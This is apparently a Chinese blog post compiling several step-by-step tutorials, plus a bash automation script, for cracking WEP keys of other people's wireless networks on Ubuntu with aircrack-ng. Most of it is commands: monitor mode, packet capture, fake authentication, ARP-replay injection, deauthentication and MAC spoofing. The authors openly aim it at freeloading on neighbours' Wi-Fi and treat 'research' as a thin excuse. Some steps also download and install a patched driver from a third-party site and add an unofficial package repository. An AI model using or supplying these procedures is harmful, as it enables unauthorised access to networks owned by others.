用Ubuntu破解wep无线加密

用Ubuntu破解wep无线加密2009-09-29 09:50一、安装ubuntu和aircrack-ng
先安装 Ubuntu最新版,更新系统到最新
终端中输入 sudo apt-get install aircrack-ng 安装aircrack-ng
没联网的话 到别的电脑上网下载aircrack-ng Ubuntu DEB安装包 安装

二、破解过程
1、启动无线网卡的监控模式,在终端中输入:sudo airmon-ng start wlan0
(wlan0是无线网卡的端口,可在终端中输入 ifconfig 查看)

2、查看无线AP在终端中输入:
sudo airodump-ng mon0
(特别说明:启动监控模式后无线网的端口现在是 mon0 !!!)
看看有哪些采用wep加密的AP在线,然后按 ctrl+c 退出,保留终端

3、抓包
另开一个终端,输入:
sudo airodump-ng -c 6 --bssid AP's MAC -w wep mon0
(-c 后面跟着的6是要破解的AP工作频道,--bissid后面跟着的AP's MAC是要欲破解AP的MAC地址,-w后面跟着wep的是抓下来的数据包DATA保存的文件名,具体情况根据步骤2里面的在线AP更改频道和MAC地 址,DATA保存的文件名可随便命名)

4、与AP建立虚拟连接
再另开一个终端,输入:
sudo aireplay-ng -1 0 -a AP's MAC -h My MAC mon0
(-h后面跟着的My MAC是自己的无线网卡的MAC地址)

5、进行注入
成功建立虚拟连接后输入:
sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP's MAC -h My MAC mon0
现在回头看下步骤3的终端是不是DATA在开始飞涨!

6、解密
收集有5000个以上的DATA之后,另开一个终端,输入:
sudo aircrack-ng wep*.cap
进行解密
(如果没算出来的话,继续等,aircrack-ng 会在DATA每增加多5000个之后就自动再运行,直到算出密码为至)

7、收工
破 解出密码后在终端中输入 sudo airmon-ng stop mon0 关闭监控模式,不然无线网卡会一直向刚刚的AP进行注入的,用ctrl+c退出或者直接关闭终端都是不行的。 现在可以冲浪去了,或者重复步聚1-7破解其它的AP 呵呵兄弟们冲浪时可别太猛了,不然把主人给冲翻了可就不好。


///////////////////////////////////////////////////
用Ubuntu破解WEP密钥

  看了这篇文章,任何人都可以安装和运行Linux,并破解WEP密钥。我一共花了整整两天,并阅读了大量资料才做出这个东西,现在拿出来和大家分享。

  看了这篇文章,任何人都可以安装和运行Linux,并破解WEP密钥。我一共花了整整两天,并阅读了大量资料才做出 这个东西,现在拿出来和大家分享。我不是Linux方面的专家。你所需要的就是一个有无线网卡的旧笔记本和一份Ubuntu Linux的拷贝,这是目前最流行并且最易于安装的Linux发行版本之一。

  第一步,很显然,是安装Ubuntu。从CD启动,按指示操作,非常简单。要注意的是,接下来的每一步都要有序进行,否则就达不到预期目标。

  下一步是安装其它程序。首先要保证你的本本可以联网。安装其它程序,需要打开一个终端窗口,并键入如下代码:


  sudo cp /etc/apt/sources.list /etc/apt/sources.list_backup

  sudo gedit /etc/apt/sources.list
 

  在编辑器中,用以下代码代替其它东西:


  ## Add comments (##) in front of any line to remove it from being checked.
  ## Use the following sources.list at your own risk.

  deb http://archive.ubuntu.com/ubuntu dapper main restricted universe multiverse

  deb-src http://archive.ubuntu.com/ubuntu dapper main restricted universe multiverse

  ## MAJOR BUG FIX UPDATES produced after the final release

  deb http://archive.ubuntu.com/ubuntu dapper-updates main restricted universe multiverse

  deb-src http://archive.ubuntu.com/ubuntu dapper-updates main restricted universe multiverse

  ## UBUNTU SECURITY UPDATES

  deb http://security.ubuntu.com/ubuntu dapper-security main restricted universe multiverse

  deb-src http://security.ubuntu.com/ubuntu dapper-security main restricted universe multiverse

  ## BACKPORTS REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)

  deb http://archive.ubuntu.com/ubuntu dapper-backports main restricted universe multiverse

  deb-src http://archive.ubuntu.com/ubuntu dapper-backports main restricted universe multiverse

  ## PLF REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)

  deb http://packages.freecontrib.org/ubuntu/plf dapper free non-free

  deb-src http://packages.freecontrib.org/ubuntu/plf dapper free non-free
 

    保存文件、退出编辑器。敲入如下命令:


sudo apt-get update

    现在我们可以安装后续将会用到的包了:


  sudo apt-get install build-essential

  sudo apt-get install aircrack

  sudo apt-get install kismet

  sudo apt-get install airsnort

  sudo apt-get install linux-source

  sudo apt-get install linux-headers

  sudo apt-get install sharutils
 

  接下来你应该更新整个系统,方法是,进入系统菜单——>Administration——>Update Manager。单击“Check”,开始安装更新。然后重启系统。完成后,为Madwifi驱动打补丁。

  这个地方可能会有点复杂。我的无线网卡(Linksys WPC55AG)用的是Atheros驱动,我需要对之打补丁。如果你的驱动和我的不同,你需要研究一下是否需要为驱动打补丁,是否甚至可以和 Aircrack套件协同工作。Aircrack-ng.org的论坛是一个用来测试的好地方,当然了,google search也是的。如果你的网卡也是Atheros的,我们称之为ath0,那么,在终端窗口敲入iwconfig,会出现一行字符,显示以太网控制器 是Atheros Communications……

  我们来打补丁。当发现硬盘旧的驱动时,会暂时让你的无线网卡无法工作。先进入/usr/src目录,下载新的驱动、删掉老驱动,然后安装新驱动,并打上补丁。你可以把以下代码拷贝粘贴到终端:


  sudo -i
  cd /usr/src

  wget http://syserr.com/stuff/madwifi-cvs-20051025.tar.gz

  wget http://syserr.com/stuff/madwifi-cvs-20051025.patch

  ifconfig ath0 down

  rmmod ath_rate_sample wlan_wep ath_rate_onoe ath_pci wlan ath_hal

  find /lib/modules -name ‘ath*’ -exec rm -v {} \;

  find /lib/modules -name ‘wlan*’ -exec rm -v {} \;

  tar zxvf madwifi-cvs-20051025.tar.gz

  cd madwifi

  patch -Np1 -i ../madwifi-cvs-20051025.patch

  make && make install

  modprobe ath_pci
 

   如果你用的是Atheros驱动,接下来我们旧需要配置kismet了。如果你用的是其它驱动,就必须看你所使用的语法。首先进入Kismet配置,然后改变源代码行。


sudo gedit /etc/kismet/kismet.conf

  把以“source=”打头的代码行变为“source=madwifi_ag,ath0,madwifi”,重启计算机。重启后你将可以通过无线网卡访问英特网。

  现在我们开始破解。打开一个终端窗口,进入监控模式,运行ksimet。


  sudo airmon start ath0

  sudo kismet
 

  找到你想要破解的无线网络,需要注意其ESSID和通道,然后敲Ctrl-C退出。

  接下来运行airodump。


sudo airodump ath0 filename channel# 1

  文件名随你意,可以作为ivs文件存在你的home目录下,或者存在你运行命令的任何目录下。

  从airodump中拷贝无线网络的bssid,具体做法是选中后敲Shift+Ctrl+C。打开一个新的终端窗口,以便我们可以运行 aireplay,开始注入数据包,导致数据量上升。我们想要airodump中的数据栏显示在10万到40万之间。数据包越多,aircrack就可以 越快地找到WEP密钥。如果WEP密钥是128位的,我们可能需要多达100万个数据包。


sudo aireplay -1 0 -e ESSID -a BSSID -h 0:1:2:3:4:5 ath0

  应该把网络和无线连接联系起来。如果总是超时,你需要离无线路由器更近,或通过“sudo iwconfig ath0 rate 1M”改变接口速率。

  接下来我们想开始注入数据包。


sudo aireplay -3 -b BSSID -h 0:1:2:3:4:5 ath0

  起初只是读取数据包,并且报告0个ARP请求、发送0个数据包。只需要等一两分钟,就会开始大量发送数据包了。如果返回文本,并报告说已经被削弱了,那么敲Ctrl+C,重新运行命令。可以通过敲入下面这条命令来加速任何事情:


sudo aireplay -0 ath0 -a BSSID ath0

  否则就只坐等事情慢慢进行吧。随着数据包开始被发送,Airodump中的数据栏就开始飙升。等到收到了预期数量的数据包,打开一个新的终端窗口,运行aircrack。


sudo aircrack filename.ivs

  一分钟后,aircrack应该返回WEP密钥。如果没有返回,那就继续回收更多的数据包。

  这做起来一点都不费劲,但可以起作用。

 

ubuntu下wep密码破解脚本

#!/bin/bash
#ubuntu下WEP密码破解 version 2.0
MY_MAC=$(set $(ifconfig|grep "wlan0") && echo $5)
AP_MAC=ff:ff:ff:ff:ff:ff
yn=y
##准备区
if [ ! -f /usr/sbin/airmon-ng ] ;then
sudo apt-get install aircrack-ng
fi
##破解区
while [ "$yn" == "y" ]
do
echo "启动无线网卡的监控模式"
sudo airmon-ng start wlan0
read -p "查看可用AP,等会好了就按ctrl+c,先回车吧" tmp
sudo airodump-ng mon0
trap "echo 继续" INT
read -p "欲破解AP的MAC地址:" AP_MAC
read -p "使用的频道(默认6):" tmp
CHANNEL=${tmp:-6}
read -p "临时文件名(默认wep):" tmp
FILE=${tmp:-wep}
gnome-terminal -e "sudo airodump-ng -c "$CHANNEL" --bssid "$AP_MAC" -w "$FILE" mon0"
echo "与AP建立虚拟连接"
sudo aireplay-ng -1 0 -a "$AP_MAC" -h "$MY_MAC" mon0
echo "进行注入"
gnome-terminal -e "sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b "$AP_MAC" -h "$MY_MAC" mon0"
read -p "请在DATA达到5000后按回车开始破解" tmp
sudo aircrack-ng "$FILE"*.cap
echo "清理战场"
rm "$FILE"*
read -p "继续不?" tmp
case tmp in
[yY]|[yY][eE][sS]) yn=y;;
[nN]*) yn=n;;
*) exit 0;;
esac
done
sudo airmon-ng stop mon0


ubuntu下破解wep无线密码 2009-11-07 02:38 (分类:linux)
这个事情本来就是个走在道德边缘的事儿,所以我就无耻的说站在研究学习的角度上大家研究研究吧。。。。


一、软硬件环境


1.最起码你得有个带无线网卡的本本或者台式机吧?

2.RT,你得装上和我一样的ubuntu系统吧?你没装或者不打算装的话就别往下看了。

3.通过新立得软件管理器或者通过apt-get install 来安装aircrack-ng这个软件包(会提示你一并安装iw这个包)。

二、破解过程:

1.开第一个shell窗口,输入ifconfig -a 看到你的无线网卡,显示为wlan0,将mac地址复制粘贴到一个文档中,后面要用到。

2.启用无线网卡。输入ifconfig wlan0 up

再输入airmon-ng start wlan0  11  开启信道6的监听,或者输入airmon-ng start wlan0开启所有信道的监听。当然如果你要破解的无线再信道n上,将6替换成对应的数值n就可以了。

3.输入airodump-ng --ivs -w name -c 11 mon0 截取数据包。name是截取的包生成文件的名字,可以随便起,我们以name为例;11是信道,同样是替换成你要破解无线所在信道对应的数值。回车确认 后,在出现的shell里找到你要破解无线对应的BSSID,也就是AP的MAC,也复制或者记录到文档里,后面要用到。

7.建立虚拟连接:开第二个shell窗口,输入aireplay-ng -1 0 -a <目标AP MAC> -h <自己的瑞银MAC> mon0,当出现笑脸后连接成功。刚才复制的mac用上了吧?呵呵!
(这步很关键,不行的话就多试几次,输入iwconfig mon0 rate 2M 降低传输速度对建立连接有帮助)

8.aireplay-ng -2 -p 0841 -c ffffffffffff -b <目标AP MAC> -h <自己的无线网卡MAC> mon0 进行交互式攻击。如成功输入Y确认

9.耐心等待第一个shell窗口的data的数字增加到1.5万以上。如果信号好的话很快,信号一般的话可以去看电视了。。。

10.开第三个shell窗口,输入aircrack-ng -n 64 -b <目标AP MAC> name*.ivs  。这里的64是指你破解的无线密码是64位加密的,如果没有破解成功,则改成128位再试,应该没有问题!

11.如果顺利,马上就能得到Key了。

 

最后,希望在蹭或者将要蹭别人无线用的朋友能有一点公德心,收发下email、上个QQ、再顶多上个网页就可以了,不要看在线视频、下载东西,不要影响无线主人的正常使用,人家是花了银子的!


Ubuntu下无客户端无线WEP加密破解实战讲解2008-04-24 13:31在图形界面中,打开一个Shell,如下图,输入ifconfig -a        察看当前网卡
       
这里我就使用USB网卡为例,可以看到有一个名为rausb0的网卡,状态是未载入,这里先不要载入,先将MAC地址修改成需伪造的任意MAC地址,
       
输入macchanger –m 00:11:22:33:44:55 rausb0
         
-m后跟要伪造的MAC,之后再跟要修改的网卡名即可,这里我们将该USB网卡MAC修改成00:11:22:33:44:55
然后再载入网卡,输入:
    
ifconfig -a rausb0 up来载入USB网卡驱动    
下来,我们可以使用如Kismet、Airosnort等工具来扫描当前无线网络的AP,
    
然后,我们需要将网卡激活成monitor模式,才可以进行后续的破解,命令如下:
    
airmon-ng start rausb0 3,这里这个3就是我们发现的AP的频道,然后输入下列命令开始抓包
airodump-ng -w test.cap --channel 3 rausb0 ,这里test.cap就是我设置的抓包文件名

下来,就可以进行FakeAuth攻击,这种攻击就是专门在预攻击无线接入点AP没有客户端活动甚至不存在Client的情况下使用的。具体命令如下:
aireplay-ng -1 1 -e AP’s ESSID -a AP’s MAC -h FakeMAC rausb0
这里-1指的就是采用FakeAuth攻击模式,后面跟延迟;-e后面跟AP的ESSID,-a后面设置AP的MAC,-h后面则是前面伪造的MAC,最后是无线网卡。

与此同时,为了IVs(初始化向量)的获取,必须进行ArpRequest注入式攻击,这个很重要,可以有效提高抓包数量及破解速度,命令如下
aireplay-ng -3 -b   AP's MAC   -h Client's MAC   -x 1024 rausb0
解释一下:-3指的是采取ArpRequest注入攻击方式,-b后面跟上要入侵的AP的MAC地址,-h后面跟的是监测到的客户端MAC地址,这里我们使用刚才伪造的客户端MAC,如上图中显示的,至于-x 1024指的是定义每秒发送数据包数量,这个值可以小一些,但最高1024就可以了,这里我使用默认,最后是指定USB无线网卡接下来,就可以同步开启aircrack-ng来进行同步破解了,命令如下:
    
aircrack-ng -x -f 2   test-01.cap这里-x是暴力破解模式,-f指的是启用密码复杂度为2 ,后面是我们即时保存的那个抓包文件,
 

posted @ 2010-05-07 10:13  suifei  阅读(6135)  评论(1编辑  收藏  举报